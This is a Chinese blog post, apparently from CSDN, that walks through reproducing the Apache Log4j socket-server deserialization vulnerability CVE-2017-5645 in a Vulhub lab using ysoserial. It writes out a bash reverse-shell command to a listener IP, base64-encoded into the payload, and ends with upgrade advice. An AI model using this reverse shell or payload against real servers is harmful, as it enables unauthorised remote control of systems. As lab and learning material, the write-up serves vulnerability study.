【Apache Log4j Server 反序列化命令执行漏洞】

最新推荐文章于 2024-07-08 20:50:13 发布
最新推荐文章于 2024-07-08 20:50:13 发布
阅读量371 收藏 1
点赞数 6
文章标签: apache log4j web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61947585/article/details/140225098
版权

一、漏洞介绍

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

二、影响版本

Apache Log4j 2.8.2之前的2.x版本 Log4j2.x<=2.8.1

三、漏洞复现

启动Vulhub靶场

进入vulhub靶场目录选择logj4下的CVE-2017-5645镜像,启动镜像。

查看镜像映射端口情况,使用的是4712端口

我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口

进入容器,查看在运行容器的ID,通过 exec 命令对指定的容器执行 bash进入查看temp目录下是否成功生成error0文件

对反弹shell进行base64编码:

bash -i >& /dev/tcp/192.168.47.143/9999 0>&1

编码后,用ysoserial构造payload:

用Windows进行监听:

成功反弹shell

四、修复建议

升级到新的安全版本

((⥎)).
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
Apache-Log4j-Server-反序列化(CVE-2017-5645)
bqnagus
09-29 444
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
weixin_44047654的博客
12-12 744
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
最新发布
m0_68045701的博客
07-08 627
网络隔离:如果立即升级不可行,应将受影响的服务器与其他网络隔离,以减少攻击面。输入过滤:对于无法升级的环境,可以考虑实现自定义的输入过滤机制,以防止恶意的序列化数据被处理。监控日志:密切关注日志系统,寻找任何异常的日志事件或未经授权的访问尝试,并及时响应。Apache Log4j是一个广泛使用的Java日志记录库,它通过提供灵活的日志记录级别、日志格式和日志目的地等功能,成为了许多开发者和组织的首选日志工具。下载后打包成jar文件进行使用,也可以直接下载jar包,在该网址的下面,往下拉就可以看到了。
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
m0_52701599的博客
04-06 3020
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
log4j反序列化漏洞详解及利用
热门推荐
Mr.Wang的博客
12-20 1万+
Log4j漏洞详解:带你体验一把hacker之路!
【java安全Log4j反序列化漏洞
leekos的博客,分享web安全相关知识~
08-18 2159
Log4jApache的开源项目,可以实现对System.out等打印语句的替代,并且可以结合spring等项目,实现把日志输出到控制台或文件等。本文介绍的Log4j反序列化漏洞都是由于未对传入的需要发序列化的数据进行过滤,导致了恶意构造从而造成相关的反序列化漏洞。方法进行反序列化,并且整个步骤没有任何过滤,因此当我们传入的数据为恶意的cc链就可以触发反序列化漏洞了。我们运行一下这个类,它会监听本地的7777端口,然后我们需要将数据传递进去。这里和上面类似,也会将接受到的数据以。的构造方法,返回一个。
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
最详细的Log4j使用教程
Code_LT的博客
07-08 4137
其实您也可以完全不使用配置文件,而是在代码中配置Log4j环境。但是,使用配置文件将使您的应用程序更加灵活。Log4j支持两种配置文件格式,一种是XML格式的文件,一种是Java特性文件(键=值)。下面我们介绍使用Java特性文件做为配置文件的方法:其中,level 是日志记录的优先级,分为OFF、FATAL、ERROR、WARN、INFO、DEBUG、ALL或者您定义的级别。Log4j建议只使用四个级别,优 先级从高到低分别是ERROR、WARN、INFO、DEBUG。
【CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞
weixin_45742777的博客
07-19 5620
【CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
weixin_44047654的博客
12-11 1573
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
log4j反序列化漏洞复现
qq_52263650的博客
05-31 924
Apache Log4j 是一个用于 Java 的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2 之前的 2.x 版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码
log4j反序列化漏洞
g1345444的博客
02-19 951
log4j2是apache下的java应用常见的开源日志库,是一个就Java的日志记录工具。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。需要说明的是,这里忽略了具体格式化时的逻辑,因为块数据格式化时使用的逻辑可能不同,而且与漏洞无关,重要的只有处理jndi表达式那块。406行的循环是一个重要的逻辑,最终的触发点也是在这个循环中产生的,这里的。为空,所以不会进这里的if语句;
漏洞复现】Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
过期的秋刀鱼
11-04 889
ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全反序列化该数据时,将自动调用该链并导致在应用程序主机上执行命令。攻击者可以通过发送一个特别制作的2进制payload,在组件将字节反序列化为对象时,触发并执行构造的payload代码。将反弹shell进行。
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新网络安全性能优化最佳实践
2401_83739777的博客
04-16 1428
Log4jApache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;Apache Log4j2是 Log4j的升级版本,据分析,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于可替换的变量,并且Log4j支持JNDI远程加载的方式替换变量值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值